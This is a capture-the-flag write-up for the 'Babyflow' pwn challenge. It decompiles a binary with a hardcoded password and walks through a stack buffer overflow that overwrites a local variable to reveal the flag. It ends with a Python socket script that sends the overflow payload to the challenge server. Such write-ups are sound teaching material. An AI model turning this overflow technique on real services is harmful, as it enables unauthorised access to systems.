# Warmup - Babyflow

## Challenge

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FMj94sCnvTDhNlNVf0FiN%2FScreenshot%202024-11-16%20at%204.38.16%E2%80%AFPM.png?alt=media&#x26;token=baa7789a-b63c-4b92-bf82-3902caa97728" alt="" width="375"><figcaption></figcaption></figure>

## Warmup PWN Challenge: babyflow Writeup

In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.

### Analyzing the Binary

We start by running binary ninja to decompile the file.

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FKPrtptSEKjJokghE4GzM%2FScreenshot%202024-11-17%20at%2012.06.14%E2%80%AFAM.png?alt=media&#x26;token=049b7ec7-ba47-4122-ab63-4106880eb0bf" alt="" width="563"><figcaption></figcaption></figure>

We examine the decompiled code snippet:

```c
int32_t main(int32_t argc, char** argv, char** envp)
{
    int32_t var_c = 0;
    printf("Enter password: ");
    fgets(&buf, 50, stdin);

    if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
        puts("Incorrect Password!");
    else
        puts("Correct Password!");

    if (var_c == 0)
        puts("Are you sure you are admin? o.O");
    else
        puts("INTIGRITI{the_flag_is_different_…}");

    return 0;
}
```

#### **Trying to use the password**

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FwWH8Twkb9xODD9CgzwAR%2FScreenshot%202024-11-16%20at%2011.51.54%E2%80%AFPM.png?alt=media&#x26;token=f5b07533-da55-4b8b-864c-9f66f3f7aff0" alt=""><figcaption></figcaption></figure>

#### **Key Points:**

* The program asks for a password input and checks it using `strncmp` against the hardcoded string `"SuPeRsEcUrEPaSsWoRd123"`.
* If the password is correct, it checks the value of `var_c`.
  * If `var_c` is still `0`, it prints a message asking if you are the admin.
  * If `var_c` is non-zero, it reveals the flag.

### Step 2: Crafting the Exploit

We need to:

1. Input the correct password to pass the check.
2. Overflow the buffer to modify `var_c` and set it to a non-zero value, which will reveal the flag.

**Buffer Overflow:**

* The buffer size is 50 bytes, and the password takes up the first 22 bytes.
* That leaves 28 bytes for padding and overflow.
* We need to overflow into `var_c` (a 4-byte integer) and set it to `1`.

### Step 3: Writing the Python Exploit

Now, let's write a Python script to send the payload to the server.

```python
import socket

# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)

# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password))  # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00"  # Overwrite var_c with 1

# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))

# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)

# Close the connection
s.close()

```

### Step 4: Running the Exploit

Once the script is ready, simply run it using:

```bash
python babyflow.py
```

If the exploit is successful, the program will print the flag:

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FHyhK3ECDwOuk07FSKzVq%2FScreenshot%202024-11-16%20at%204.33.05%E2%80%AFPM.png?alt=media&#x26;token=23ca6f6e-891a-4d87-8b3c-1792041c416e" alt=""><figcaption></figcaption></figure>

### Conclusion

This challenge demonstrates a classic buffer overflow attack. We bypass the password check by inputting the correct password, then overflow the buffer to manipulate a local variable (`var_c`). When `var_c` is changed from `0` to `1`, the program reveals the flag.

By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.